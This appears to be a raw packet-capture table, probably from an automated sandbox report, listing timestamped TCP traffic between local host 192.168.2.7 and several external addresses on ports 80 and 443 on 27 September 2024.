Sep 27, 2024 01:38:12.960069895 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960081100 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960091114 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:12.960091114 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:12.960093021 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960103035 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:12.960107088 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960119009 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960131884 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960141897 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:12.960141897 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:12.960184097 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:12.960649967 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960702896 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:12.960741043 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960752964 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960762978 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960774899 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960784912 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960793972 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:12.960797071 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960822105 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:12.960850000 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:12.960892916 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960910082 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960921049 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960931063 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960942030 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960952997 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960963964 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960973024 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:12.960973024 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:12.960974932 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960988045 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.960999012 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.961009979 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.961023092 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:12.961030006 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:12.961030006 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:12.961050987 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:12.961169958 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.040765047 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.040795088 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.040807962 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.040839911 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.040839911 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.040863991 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.040878057 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.040895939 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.040906906 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.040920019 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.040937901 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.040949106 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.040954113 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.040954113 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.040954113 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.040958881 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.040980101 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.040980101 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.040990114 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.040994883 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.041007042 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.041017056 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.041026115 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.041040897 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.041058064 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.041093111 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.044043064 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044105053 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.044147968 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044162989 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044173002 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044188976 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044198036 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044208050 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044218063 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044226885 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044229984 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.044229984 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.044229984 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.044236898 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044249058 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044275045 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.044310093 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.044310093 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.044317961 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044332981 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044341087 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044344902 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044353962 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044364929 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044372082 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044379950 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044389009 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044389963 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.044389963 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.044398069 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044435978 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.044436932 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.044651031 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.044744015 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.047923088 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.047980070 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.047981977 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.047991991 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048001051 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048010111 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048033953 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048036098 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048036098 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048046112 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048053980 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048058033 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048069000 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048069954 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048079967 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048125029 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048125029 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048132896 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048145056 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048172951 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048201084 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048209906 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048221111 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048228979 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048239946 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048249006 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048249006 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048283100 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048307896 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048441887 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048487902 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048497915 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048507929 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048547983 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048552990 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048558950 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048569918 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048603058 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048619032 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048646927 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048657894 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048682928 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048682928 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048698902 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048708916 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048719883 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048721075 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048767090 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048767090 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048799038 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048808098 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048816919 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048827887 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048837900 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048846006 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048873901 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048887014 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.048901081 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.048959970 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:13.049004078 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.049004078 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:13.263437033 CEST	49735	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:13.263556004 CEST	443	49735	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:13.263650894 CEST	49735	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:13.264406919 CEST	49735	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:13.264451027 CEST	443	49735	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:13.659481049 CEST	49736	443	192.168.2.7	172.67.194.216
Sep 27, 2024 01:38:13.659539938 CEST	443	49736	172.67.194.216	192.168.2.7
Sep 27, 2024 01:38:13.659605026 CEST	49736	443	192.168.2.7	172.67.194.216
Sep 27, 2024 01:38:13.663388968 CEST	49736	443	192.168.2.7	172.67.194.216
Sep 27, 2024 01:38:13.663400888 CEST	443	49736	172.67.194.216	192.168.2.7
Sep 27, 2024 01:38:13.940424919 CEST	443	49735	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:13.940509081 CEST	49735	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:13.941003084 CEST	49735	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:13.941015959 CEST	443	49735	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:13.943288088 CEST	49735	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:13.943301916 CEST	443	49735	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:14.130139112 CEST	443	49736	172.67.194.216	192.168.2.7
Sep 27, 2024 01:38:14.130219936 CEST	49736	443	192.168.2.7	172.67.194.216
Sep 27, 2024 01:38:14.132169008 CEST	49736	443	192.168.2.7	172.67.194.216
Sep 27, 2024 01:38:14.132180929 CEST	443	49736	172.67.194.216	192.168.2.7
Sep 27, 2024 01:38:14.132430077 CEST	443	49736	172.67.194.216	192.168.2.7
Sep 27, 2024 01:38:14.173552036 CEST	49736	443	192.168.2.7	172.67.194.216
Sep 27, 2024 01:38:14.185512066 CEST	49736	443	192.168.2.7	172.67.194.216
Sep 27, 2024 01:38:14.185601950 CEST	49736	443	192.168.2.7	172.67.194.216
Sep 27, 2024 01:38:14.185663939 CEST	443	49736	172.67.194.216	192.168.2.7
Sep 27, 2024 01:38:14.612355947 CEST	443	49736	172.67.194.216	192.168.2.7
Sep 27, 2024 01:38:14.612468004 CEST	443	49736	172.67.194.216	192.168.2.7
Sep 27, 2024 01:38:14.612546921 CEST	49736	443	192.168.2.7	172.67.194.216
Sep 27, 2024 01:38:14.614284039 CEST	49736	443	192.168.2.7	172.67.194.216
Sep 27, 2024 01:38:14.614300013 CEST	443	49736	172.67.194.216	192.168.2.7
Sep 27, 2024 01:38:14.614314079 CEST	49736	443	192.168.2.7	172.67.194.216
Sep 27, 2024 01:38:14.614320040 CEST	443	49736	172.67.194.216	192.168.2.7
Sep 27, 2024 01:38:14.630233049 CEST	49737	443	192.168.2.7	172.67.132.32
Sep 27, 2024 01:38:14.630279064 CEST	443	49737	172.67.132.32	192.168.2.7
Sep 27, 2024 01:38:14.630341053 CEST	49737	443	192.168.2.7	172.67.132.32
Sep 27, 2024 01:38:14.630719900 CEST	49737	443	192.168.2.7	172.67.132.32
Sep 27, 2024 01:38:14.630734921 CEST	443	49737	172.67.132.32	192.168.2.7
Sep 27, 2024 01:38:14.866293907 CEST	443	49735	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:14.866420984 CEST	443	49735	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:14.866504908 CEST	49735	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:14.866661072 CEST	49735	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:14.866683006 CEST	443	49735	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:14.867991924 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:14.872869015 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.051584959 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.051647902 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.051681042 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.051681995 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.051734924 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.051768064 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.051803112 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.051803112 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.051830053 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.051837921 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.051872969 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.051904917 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.051911116 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.051937103 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.051958084 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.051969051 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052007914 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052016020 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052042961 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052058935 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052077055 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052108049 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052114964 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052149057 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052149057 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052177906 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052212000 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052220106 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052262068 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052263975 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052294970 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052341938 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052345991 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052378893 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052385092 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052412033 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052443027 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052444935 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052500010 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052535057 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052535057 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052548885 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052551985 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052601099 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052609921 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052634001 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052666903 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052670002 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052690029 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052700043 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052717924 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052732944 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052781105 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052814007 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052833080 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052833080 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052833080 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052845001 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052886963 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052886963 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052896023 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052928925 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052948952 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.052961111 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.052993059 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053009033 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053009033 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053025961 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053057909 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053076029 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053076029 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053108931 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053158045 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053189039 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053189039 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053206921 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053210974 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053240061 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053258896 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053272963 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053303957 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053329945 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053329945 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053353071 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053360939 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053385973 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053417921 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053432941 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053432941 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053450108 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053493977 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053499937 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053503990 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053533077 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053560972 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053580046 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053586960 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053627968 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053651094 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053661108 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053693056 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053721905 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053721905 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053730011 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053762913 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053776026 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053776026 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053795099 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053822041 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053827047 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053859949 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053869963 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053869963 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053909063 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053941965 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053972006 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.053992987 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053992987 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.053992987 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054003954 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054035902 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054068089 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054068089 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054073095 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054095030 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054106951 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054126978 CEST	49734	80	192.168.2.7	147.45.44.104
